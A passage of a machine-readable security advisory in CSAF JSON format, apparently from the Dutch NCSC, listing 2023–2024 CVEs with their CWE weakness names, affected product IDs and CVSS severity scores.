"CSAFPID-89587"
]
}
],
"title": "CVE-2023-45288"
},
{
"cve": "CVE-2023-48795",
"cwe": {
"id": "CWE-222",
"name": "Truncation of Security-relevant Information"
},
"notes": [
{
"category": "other",
"text": "Truncation of Security-relevant Information",
"title": "CWE-222"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1650765",
"CSAFPID-1650757",
"CSAFPID-1650758",
"CSAFPID-1650767",
"CSAFPID-1650759",
"CSAFPID-1650760",
"CSAFPID-1650761",
"CSAFPID-89587",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503575",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-48795",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-48795.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1650765",
"CSAFPID-1650757",
"CSAFPID-1650758",
"CSAFPID-1650767",
"CSAFPID-1650759",
"CSAFPID-1650760",
"CSAFPID-1650761",
"CSAFPID-89587",
"CSAFPID-220643",
"CSAFPID-342816",
"CSAFPID-667692",
"CSAFPID-764250",
"CSAFPID-764813",
"CSAFPID-816317",
"CSAFPID-816361",
"CSAFPID-816798",
"CSAFPID-816799",
"CSAFPID-816800",
"CSAFPID-816801",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-816852",
"CSAFPID-816853",
"CSAFPID-816854",
"CSAFPID-816855",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-816870",
"CSAFPID-816871",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-1503603",
"CSAFPID-1503612",
"CSAFPID-1503575",
"CSAFPID-1503640",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663"
]
}
],
"title": "CVE-2023-48795"
},
{
"cve": "CVE-2023-49083",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"notes": [
{
"category": "other",
"text": "NULL Pointer Dereference",
"title": "CWE-476"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-49083",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-49083.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-342816",
"CSAFPID-764275",
"CSAFPID-764752",
"CSAFPID-816798",
"CSAFPID-816801",
"CSAFPID-816846",
"CSAFPID-912044",
"CSAFPID-912045",
"CSAFPID-912046",
"CSAFPID-912561",
"CSAFPID-912567",
"CSAFPID-912600",
"CSAFPID-912601",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-816845",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2023-49083"
},
{
"cve": "CVE-2023-51384",
"cwe": {
"id": "CWE-304",
"name": "Missing Critical Step in Authentication"
},
"notes": [
{
"category": "other",
"text": "Missing Critical Step in Authentication",
"title": "CWE-304"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-51384",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-51384.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2023-51384"
},
{
"cve": "CVE-2023-51385",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"title": "CWE-78"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-51385",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-51385.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-89587"
]
}
],
"title": "CVE-2023-51385"
},
{
"cve": "CVE-2023-52425",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-52425",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-52425.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2023-52425"
},
{
"cve": "CVE-2023-52426",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)",
"title": "CWE-776"
}
],
"product_status": {
"known_affected": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-52426",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2023/CVE-2023-52426.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-89587",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2023-52426"
},
{
"cve": "CVE-2024-1874",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"title": "CWE-77"
},
{
"category": "other",
"text": "Improper Encoding or Escaping of Output",
"title": "CWE-116"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-1874",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-1874.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-1874"
},
{
"cve": "CVE-2024-2408",
"cwe": {
"id": "CWE-203",
"name": "Observable Discrepancy"
},
"notes": [
{
"category": "other",
"text": "Observable Discrepancy",
"title": "CWE-203"
},
{
"category": "other",
"text": "Observable Timing Discrepancy",
"title": "CWE-208"
},
{
"category": "other",
"text": "Use of a Broken or Risky Cryptographic Algorithm",
"title": "CWE-327"
},
{
"category": "other",
"text": "Covert Timing Channel",
"title": "CWE-385"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-2408",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-2408.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-2408"
},
{
"cve": "CVE-2024-2511",
"cwe": {
"id": "CWE-404",
"name": "Improper Resource Shutdown or Release"
},
"notes": [
{
"category": "other",
"text": "Improper Resource Shutdown or Release",
"title": "CWE-404"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
},
{
"category": "other",
"text": "Improperly Controlled Sequential Memory Allocation",
"title": "CWE-1325"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-2511",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-2511.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-2511"
},
{
"cve": "CVE-2024-4577",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)",
"title": "CWE-88"
},
{
"category": "other",
"text": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"title": "CWE-78"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-4577",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-4577.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-4577"
},
{
"cve": "CVE-2024-4603",
"cwe": {
"id": "CWE-606",
"name": "Unchecked Input for Loop Condition"
},
"notes": [
{
"category": "other",
"text": "Unchecked Input for Loop Condition",
"title": "CWE-606"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-4603",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-4603.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-4603"
},
{
"cve": "CVE-2024-4741",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"notes": [
{
"category": "other",
"text": "Use After Free",
"title": "CWE-416"
}
],
"product_status": {
"known_affected": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-4741",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-4741.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-345049",
"CSAFPID-611417",
"CSAFPID-1673479",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
}
],
"title": "CVE-2024-4741"
},
{
"cve": "CVE-2024-5458",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-5458",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-5458.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-5458"
},
{
"cve": "CVE-2024-5535",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"notes": [
{
"category": "other",
"text": "Exposure of Sensitive Information to an Unauthorized Actor",
"title": "CWE-200"
},
{
"category": "other",
"text": "Improper Restriction of Operations within the Bounds of a Memory Buffer",
"title": "CWE-119"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673508",
"CSAFPID-1673525"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-5535",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-5535.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673508",
"CSAFPID-1673525"
]
}
],
"title": "CVE-2024-5535"
},
{
"cve": "CVE-2024-5585",
"cwe": {
"id": "CWE-116",
"name": "Improper Encoding or Escaping of Output"
},
"notes": [
{
"category": "other",
"text": "Improper Encoding or Escaping of Output",
"title": "CWE-116"
},
{
"category": "other",
"text": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"title": "CWE-78"
},
{
"category": "other",
"text": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)",
"title": "CWE-88"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-5585",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-5585.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673422",
"CSAFPID-345049",
"CSAFPID-611417"
]
}
],
"title": "CVE-2024-5585"
},
{
"cve": "CVE-2024-6119",
"cwe": {
"id": "CWE-843",
"name": "Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)"
},
"notes": [
{
"category": "other",
"text": "Access of Resource Using Incompatible Type (\u0027Type Confusion\u0027)",
"title": "CWE-843"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673508",
"CSAFPID-1673525"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-6119",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-6119.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673508",
"CSAFPID-1673525"
]
}
],
"title": "CVE-2024-6119"
},
{
"cve": "CVE-2024-6232",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "other",
"text": "Inefficient Regular Expression Complexity",
"title": "CWE-1333"
}
],
"references": [
{
"category": "self",
"summary": "CVE-2024-6232",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-6232.json"
}
],
"title": "CVE-2024-6232"
},
{
"cve": "CVE-2024-7264",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Read",
"title": "CWE-125"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1673529",
"CSAFPID-1673479",
"CSAFPID-1673511",
"CSAFPID-1673512"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-7264",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-7264.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1673529",
"CSAFPID-1673479",
"CSAFPID-1673511",
"CSAFPID-1673512"
]
}
],
"title": "CVE-2024-7264"
},
{
"cve": "CVE-2024-7592",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"references": [
{
"category": "self",
"summary": "CVE-2024-7592",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-7592.json"
}
],
"title": "CVE-2024-7592"
},
{
"cve": "CVE-2024-21131",
"product_status": {
"known_affected": [
"CSAFPID-1503299",
"CSAFPID-1503306",
"CSAFPID-1503302",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21131",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21131.json"
}
],
"title": "CVE-2024-21131"
},
{
"cve": "CVE-2024-21138",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"notes": [
{
"category": "other",
"text": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"title": "CWE-835"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21138",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21138.json"
}
],
"title": "CVE-2024-21138"
},
{
"cve": "CVE-2024-21140",
"product_status": {
"known_affected": [
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503299",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21140",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21140.json"
}
],
"title": "CVE-2024-21140"
},
{
"cve": "CVE-2024-21144",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "other",
"text": "Uncontrolled Resource Consumption",
"title": "CWE-400"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503299",
"CSAFPID-1503302",
"CSAFPID-1503306",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21144",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21144.json"
}
],
"title": "CVE-2024-21144"
},
{
"cve": "CVE-2024-21145",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"notes": [
{
"category": "other",
"text": "Out-of-bounds Write",
"title": "CWE-787"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1503299",
"CSAFPID-1503306",
"CSAFPID-1503302",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21145",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21145.json"
}
],
"title": "CVE-2024-21145"
},
{
"cve": "CVE-2024-21147",
"product_status": {
"known_affected": [
"CSAFPID-1503306",
"CSAFPID-1503302",
"CSAFPID-1503299",
"CSAFPID-1503575",
"CSAFPID-1503603",
"CSAFPID-764250",
"CSAFPID-1503612",
"CSAFPID-1503640",
"CSAFPID-342816",
"CSAFPID-816845",
"CSAFPID-816846",
"CSAFPID-1503661",
"CSAFPID-1503663",
"CSAFPID-764813"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21147",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21147.json"
}
],
"title": "CVE-2024-21147"
},
{
"cve": "CVE-2024-21233",
"product_status": {
"known_affected": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21233",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21233.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1673385",
"CSAFPID-1673442",
"CSAFPID-1673386"
]
}
],
"title": "CVE-2024-21233"
},
{
"cve": "CVE-2024-21242",
"product_status": {
"known_affected": [
"CSAFPID-1673443",
"CSAFPID-1673444",
"CSAFPID-1673445"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21242",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21242.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1673443",
"CSAFPID-1673444",
"CSAFPID-1673445"
]
}
],
"title": "CVE-2024-21242"
},
{
"cve": "CVE-2024-21251",
"product_status": {
"known_affected": [
"CSAFPID-1673450",
"CSAFPID-1673451",
"CSAFPID-1673452"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21251",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21251.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.1,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1673450",
"CSAFPID-1673451",
"CSAFPID-1673452"
]
}
],
"title": "CVE-2024-21251"
},
{
"cve": "CVE-2024-21261",
"product_status": {
"known_affected": [
"CSAFPID-1673144",
"CSAFPID-1503575",
"CSAFPID-1673188"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-21261",
"url": "https://api.ncsc.nl/velma/v1/vulnerabilities/2024/CVE-2024-21261.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1673144",
"CSAFPID-1503575",
